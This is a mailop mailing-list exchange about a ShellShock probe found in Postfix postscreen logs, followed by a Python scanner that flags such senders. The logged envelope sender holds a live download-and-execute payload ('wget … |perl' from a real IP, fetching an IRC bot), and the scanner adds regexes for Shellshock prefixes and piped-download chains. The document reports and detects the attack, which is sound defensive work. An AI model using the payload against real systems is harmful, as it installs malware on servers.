On 2023-01-14 at 09:16:05 UTC-0500 (Sat, 14 Jan 2023 16:16:05 +0200)
Mary via mailop <[email protected]>
is rumored to have said:
Within the past several days, I've been monitoring a kind of exploit
that affects the 'from' RCPT part of the smtp conversation:
```
postfix/postscreen[633104]: PREGREET 8 after 0.09 from
[159.89.232.70]:52350: HELO x\r\n
postfix/postscreen[633104]: NOQUEUE: reject: RCPT from
[159.89.232.70]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget
-qO - 193.56.28.202/botF|perl>, to=<root>, proto=SMTP, helo=<x>
postfix/postscreen[633104]: DATA without valid RCPT from
[159.89.232.70]:52350
```
Does anyone know what kind of software is the target of this attack?
It's a very lame attempt to exploit ShellShock. "Very lame" because that
vulnerability is surely saturated by now (i.e. all vulnerable systems
were popped years ago) and it didn't wait for the banner or give a
minimally valid HELO, behavior that good mailservers have been shunning
for almost 20 years now.
It's a demo in "spammers & malware users are generally stupid."
Obviously, it's not postfix, which quickly drops the connection. Could
it be some kind of software that parses logs?
Hard to say, since obviously they also had more payload (else why try
DATA?)
ShellShock attacks are grossly untargeted because the ways that mail
(and web) servers make themselves vulnerable by errors in configuration
are widely variable. They don't care if a particular MTA is Postfix 3.7
or Sendmail 5.2, because some mail admin might have had a lapse in
configuration rigor on either.
I'd appreciate your thoughts.
PS:
the payload is a perl IRC bot
_______________________________________________
mailop mailing list
[email protected]
https://list.mailop.org/listinfo/mailop
--
Bill Cole
[email protected] or [email protected]
(AKA @grumpybozo and many *@billmail.scconsult.com addresses)
Not Currently Available For Hire
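The thread leaves the question of "what is being targeted" open, but the three postscreen lines quoted above are enough to build a detection: a client that pre-greets, presents a bash-function-definition sender, and then tries DATA without a valid recipient. The scanner below is an added example, not code from the thread or from Postfix; the log lines it runs over are constructed to match the shape of the quoted output, with documentation-range addresses and a `.invalid` hostname in place of the real ones.

```python
"""Scan Postfix postscreen log lines for Shellshock-style payloads in the
envelope sender and summarise the other behaviours the thread mentions
(PREGREET, DATA without valid RCPT).  Added example, not code from the
mailop thread or from Postfix."""
import re
from dataclasses import dataclass, field

# Constructed sample lines shaped like the postscreen output quoted in the
# thread.  IPs are documentation ranges and the dropper host is a
# placeholder, not the addresses from the report.
SAMPLE_LOG = r"""
Jan 14 09:15:58 mx postfix/postscreen[633104]: PREGREET 8 after 0.09 from [192.0.2.10]:52350: HELO x\r\n
Jan 14 09:15:58 mx postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [192.0.2.10]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget -qO - dropper.invalid/botF|perl>, to=<root>, proto=SMTP, helo=<x>
Jan 14 09:15:58 mx postfix/postscreen[633104]: DATA without valid RCPT from [192.0.2.10]:52350
Jan 14 09:16:02 mx postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [198.51.100.7]:41000: 550 5.5.1 Protocol error; from=<[email protected]>, to=<root>, proto=SMTP, helo=<x>
Jan 14 09:16:05 mx postfix/postscreen[633104]: PASS NEW [203.0.113.9]:25
"""

PREGREET_RE = re.compile(
    r"postscreen\[\d+\]: PREGREET \d+ after [\d.]+ from \[(?P<ip>[^\]]+)\]:\d+: (?P<data>.*)$")
REJECT_RE = re.compile(
    r"postscreen\[\d+\]: NOQUEUE: reject: RCPT from \[(?P<ip>[^\]]+)\]:\d+: "
    r"(?P<status>\d{3} \d\.\d\.\d) [^;]*; from=<(?P<sender>.*?)>, to=<(?P<rcpt>[^>]*)>, "
    r"proto=(?P<proto>\w+), helo=<(?P<helo>[^>]*)>$")
DATA_NO_RCPT_RE = re.compile(
    r"postscreen\[\d+\]: DATA without valid RCPT from \[(?P<ip>[^\]]+)\]:\d+$")

# Shellshock's trigger is a value that begins with a bash function
# definition "() { ... };" followed by a trailing command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*\}\s*;")
# A sender that fetches something and pipes it into an interpreter is a
# dropper whether or not the Shellshock prefix is present.
DOWNLOAD_EXEC_RE = re.compile(r"\b(wget|curl)\b.*\|\s*(perl|sh|bash|python\d?)\b")


@dataclass
class ClientReport:
    ip: str
    pregreet: bool = False
    data_without_rcpt: bool = False
    download_exec: bool = False
    shellshock_senders: list = field(default_factory=list)
    rejected_senders: list = field(default_factory=list)

    @property
    def indicators(self):
        """Ordered list of the behaviours seen from this client."""
        found = []
        if self.pregreet:
            found.append("pregreet")
        if self.shellshock_senders:
            found.append("shellshock-sender")
        if self.download_exec:
            found.append("download-and-exec")
        if self.data_without_rcpt:
            found.append("data-without-rcpt")
        return found


def scan(log_text):
    """Group postscreen events by client IP and flag payload-bearing senders."""
    reports = {}

    def report_for(ip):
        return reports.setdefault(ip, ClientReport(ip))

    for line in log_text.splitlines():
        if not line.strip():
            continue
        if m := PREGREET_RE.search(line):
            report_for(m["ip"]).pregreet = True
        elif m := REJECT_RE.search(line):
            rep = report_for(m["ip"])
            sender = m["sender"]
            rep.rejected_senders.append(sender)
            if SHELLSHOCK_RE.search(sender):
                rep.shellshock_senders.append(sender)
            if DOWNLOAD_EXEC_RE.search(sender):
                rep.download_exec = True
        elif m := DATA_NO_RCPT_RE.search(line):
            report_for(m["ip"]).data_without_rcpt = True
    return reports


def suspicious(reports):
    """IPs whose envelope sender carried a Shellshock prefix or a download-and-exec chain."""
    return sorted(ip for ip, rep in reports.items()
                  if rep.shellshock_senders or rep.download_exec)


if __name__ == "__main__":
    for ip in suspicious(reports := scan(SAMPLE_LOG)):
        print(ip, reports[ip].indicators)
```

Only lines postscreen already rejected are matched, so this is purely a reporting aid: Postfix itself never handed the sender string to a shell, which is the point Bill makes about the attempt being untargeted. Feeding real `/var/log/mail.log` lines into `scan()` gives a per-client summary that is handy for fail2ban-style blocking or for checking whether any other service on the host logs or processes the same envelope strings.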